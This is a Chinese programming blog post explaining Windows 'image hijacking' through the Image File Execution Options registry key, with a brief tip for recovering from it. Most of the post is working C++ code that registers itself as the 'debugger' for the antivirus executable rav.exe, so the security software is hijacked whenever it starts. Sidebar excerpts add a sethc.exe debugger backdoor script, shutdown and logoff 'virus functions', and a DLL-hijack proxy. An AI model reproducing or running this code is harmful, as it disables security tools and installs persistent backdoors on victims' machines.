VC++编程实现镜像劫持

最新推荐文章于 2021-05-18 01:12:08 发布
最新推荐文章于 2021-05-18 01:12:08 发布
阅读量623 收藏 1
点赞数
分类专栏: VC++

所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项,例如Rav.exe。然后再创建一个子键“Debugger="C:\WINDOWS\system32\drivers\”。以后只要用户双击 Rav.exe就会运行OSO的病毒文件,类似文件关联的效果。
镜像劫持的简单解决方法

  如果电脑上有杀毒软件或360什么的但是中了镜像劫持是安全软件无法运行的话,
  其实只需要更改一下安全软件的名字就能不被镜像劫持利用,个人认为这是最适合初学者的最简单办法。
  首先找到安全软件的位置大部分都放在program files文件夹下。 找到名字例如拿360做例子原文件路径X:\Program Files\360safe原名为360Safe.exe 你把名字改为36015safe.exe(名字什么都行不过就不能是安全软件的名字)然后双击此安全软件就会过镜像劫持开始运行,后面的查杀就不需要说什么了吧。这小操作可以解决燃眉之急啦。


[cpp] view plain copy print ?
  1. #include "stdafx.h" 
  2. #include <stdio.h> 
  3. #include <windows.h> 
  4.  
  5. int main(int argc, char* argv[]) 
  7.     char temp[256]; 
  8.     DWORD ret; 
  9.     LPCTSTR szRegKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"; //定义字符串指针,保存映像劫持的键位 
  10.     HKEY h_KEY; 
  11.     if(argc!=1)   //如果参数不是1个,提取第2个参数,也就是被劫持程序的路径 
  12.     { 
  13.         memset(temp,0,256); 
  14.         strcpy(temp,argv[1]);    
  15.         for(int i=0;i<strlen(temp);i++)    //将路径中的\换为/,也可以换为\\,就是代码长了点 
  16.         { 
  17.             if(temp[i]=='\\'
  18.                 temp[i]='/'
  19.         }                         
  20.         ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey,0,KEY_ALL_ACCESS,&h_KEY); //打开注册表中需要映像劫持的子键获得句柄 
  21.         if(ret==ERROR_SUCCESS) 
  22.         { 
  23.             printf("open ok!\n"); 
  24.             if(ERROR_SUCCESS==RegDeleteKey(h_KEY,"rav.exe")) //将上面打开的子键下的rav子键删除 
  25.             { 
  26.                 printf("delete ok!\n"); 
  27.                 RegCloseKey(h_KEY); 
  28.                 WinExec(temp,SW_SHOW);    //运行被劫持的程序 
  29.             } 
  30.             else 
  31.             { 
  32.                 printf("delete failed!\n"); 
  33.                 RegCloseKey(h_KEY); 
  34.             }            
  35.         } 
  36.         else 
  37.         printf("open failed!\n"); 
  38.     } 
  39.     memset(temp,0,256); 
  40.     GetModuleFileName(NULL,temp,256);   //得到程序自己的路径,为下面写入注册表做准备 
  41.     HKEY hResultKey = NULL; 
  42.     if (ERROR_SUCCESS == RegOpenKeyEx(HKEY_LOCAL_MACHINE,szRegKey, 0, KEY_ALL_ACCESS,&h_KEY))  //打开注册表中映像劫持的子键,获得句柄 
  43.     { 
  44.         DWORD dw; 
  45.         ret = RegCreateKeyEx(h_KEY,"rav.exe", 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL,&hResultKey, &dw);  //在上面打开的子键下创建rav子键并打开,获得句柄 
  46.         if (ret!=ERROR_SUCCESS) 
  47.         { 
  48.         RegCloseKey(h_KEY); 
  49.         printf("creat failed!\n"); 
  50.         return 1; 
  51.         } 
  52.         printf("creat ok!\n"); 
  53.         ret=RegSetValueEx(hResultKey,"debugger",0,REG_SZ,(const BYTE *)temp,strlen(temp)+1);   //在rav键上创建debugger键并设置值为本程序的路径用于映像劫持 
  54.         if(ret!=ERROR_SUCCESS) 
  55.         { 
  56.         RegCloseKey(h_KEY); 
  57.         RegCloseKey(hResultKey); 
  58.         return 1; 
  59.         } 
  60.         RegCloseKey(h_KEY); 
  61.         RegCloseKey(hResultKey); 
  62.         printf("set ok!\n"); 
  63.     } 
  64.     MessageBox(NULL,"ok!","成功!",MB_OK);    //用于测试程序,可以监视 
  65.      
  66.  
  67.     return 0; 

原文地址: http://blog.csdn.net/yincheng01/article/details/8107407
abcpanpeng
关注
专栏目录
VC++实现镜像劫持(360保险箱启动原理)
尹成的技术博客
08-26 3920
#include "stdafx.h"#include #include int main(int argc, char* argv[]){ char temp[256]; DWORD ret; LPCTSTR szRegKey="SOFTWARE//Microsoft//Windows NT//CurrentVersion//Image File Execution Options"; //
C++实现映像劫持
09-08
基于C++实现的映像劫持。 通过更改注册表实现对文件的打开方式的锁定更改。
C/C++实现windows下的映像劫持(上)之原理分析
热门推荐
单核CPU的小朋友的博客
09-09 5万+
本篇博客将来和大家进行“C/C++实现windows下的映像劫持的原理分析” 什么是映像劫持: 映像劫持病毒是近几年来对用户系统安全破坏程度最大的病毒之一,它将大量安全软件”绑架”, 使其无法正常运行,从而大大降低用户系统的安全性。 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些...
浏览器劫持源码
08-06
浏览器劫持源码 浏览器劫持.e
vc++ 应用源码包_1
09-15
vc++动态链接库编程之DLL典型实例源代码下载 VC++仿Dreamweaver取色器源代码 VC++挂机锁屏系统源程序 VC++建立桌面或开始菜单快捷方式 VC++界面库编程 SkinMagic 2.21 动态库版本的使用和 Skin++动态库及静态库版本...
vc++ 应用源码包_6
09-15
vc++动态链接库编程之DLL典型实例源代码下载 VC++仿Dreamweaver取色器源代码 VC++挂机锁屏系统源程序 VC++建立桌面或开始菜单快捷方式 VC++界面库编程 SkinMagic 2.21 动态库版本的使用和 Skin++动态库及静态库版本...
vc++ 应用源码包_2
09-15
vc++动态链接库编程之DLL典型实例源代码下载 VC++仿Dreamweaver取色器源代码 VC++挂机锁屏系统源程序 VC++建立桌面或开始菜单快捷方式 VC++界面库编程 SkinMagic 2.21 动态库版本的使用和 Skin++动态库及静态库版本...
C++基础病毒性函数汇总
cjz2005的博客
03-24 4027
总结了 几 个 比较常见的病毒函数。 温馨而又冰冷的提示: 严禁用于非法用途哦!!!! 前方高能,请做好心理准备。 <必备头文件:Windows.h> 1.电源类 这几个也没啥技术含量,但反复调用的杀伤力还是挺强的(开机瞬关)。 (1)注销 VOID Logoff(VOID) { WinExec("logoff.exe",SW_HIDE); } (2)关机 VOID Shutdo.........
镜像劫持
04-25
用来扫描及修改系统内的镜像劫持文件
MFC程序的注册表编程(自启动、映像劫持、文件关联)-C++文档类资源
04-20
这学期考研要看书所以没时间编程,今日手痒逞周末时间研究了一下注册表编程,通过自启动、映像劫持、文件关联三个功能及其恢复功能基本熟悉了注册表编程的大部分内容,以后做什么邪恶的东东肯定做得到~
VC++源码—动态链接库(DLL)实例
01-21
VC++源码—动态链接库(DLL)实例 VC++源码—动态链接库(DLL)实例
013-【直播】劫持注入(郁金香).c
05-14
d3d9劫持dll 示例代码 //保持原来d3d9.dll的功能 UINT_PTR g_Call14[15]={0}; void InitCall14() { LoadLibraryA("MyGame"); HMODULE hdll=LoadLibraryA("c:\\windows\\syswow64\\d3d9.dll"); //DWORD 地址=GetProcAddress(LoadLibraryA("d3d9.dll"),2); //PSGPError for(int i=1;i<=14;i++) { g_Call14[i]=(UINT_PTR)GetProcAddress(hdll,(char*)i); } return; } //1 __declspec(naked) void Direct3DShaderValidatorCreate9() { //跳转到 原来d3d9.dll Direct3DShaderValidatorCreate9 _asm jmp dword ptr [g_Call14+1*4] ; } //2 __declspec(naked) void PSGPError() { _asm jmp dword ptr [g_Call14+2*4] }
镜像劫持2
天使也掉毛
12-09 1888
镜像劫持
镜像劫持sethc
jihaichen的博客
05-09 2453
方法:Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.Creat...
VC++实现IE定向劫持跳转
尹成的技术博客
06-08 4653
建立黑名单,防范钓鱼网站#ifdef _DEBUG #define new DEBUG_NEW #undef THIS_FILE static char THIS_FILE[] = __FILE__; #endif ///////////////////////////////////////////////////////////////////////////// // CAb
C语言,后门程序,C++映像劫持后门实例分析
weixin_30317869的博客
05-18 260
// freeheart.cpp : Defines the entry point for the console application.//学习交流使用,违法使用后果自负。// by:cnblogs.com/blogg time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i// argv 2 = name.exe// argv 3 = 1 ...
镜像劫持及处理办法
weixin_34146410的博客
03-23 1085
周一去客户那里处理一台服务器说是被人攻破中了***,查看服务器上只安装了一个微点的杀毒软件(以前没有听说过),用惯了360下载并安装,安装过程中提示一个文本文件(一个文本文件语言不通顺,怀疑是人为的,根据文件名jingao.txt找到了执行文件jingao.exe将其删掉),双击快捷方式系统提示文件360safe未找到,我当时感到很奇妙,路径和文件名都没有问题...
VC++实现数字图像处理:理论与编程实践
"VC++数字图像处理编程讲座涵盖了从基础到高级的图像处理技术,包括图像文件格式、图像操作、图像处理算法、...通过这个讲座,读者将能够运用VC++实现一系列的图像处理功能,从基本操作到复杂的图像分析和识别算法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值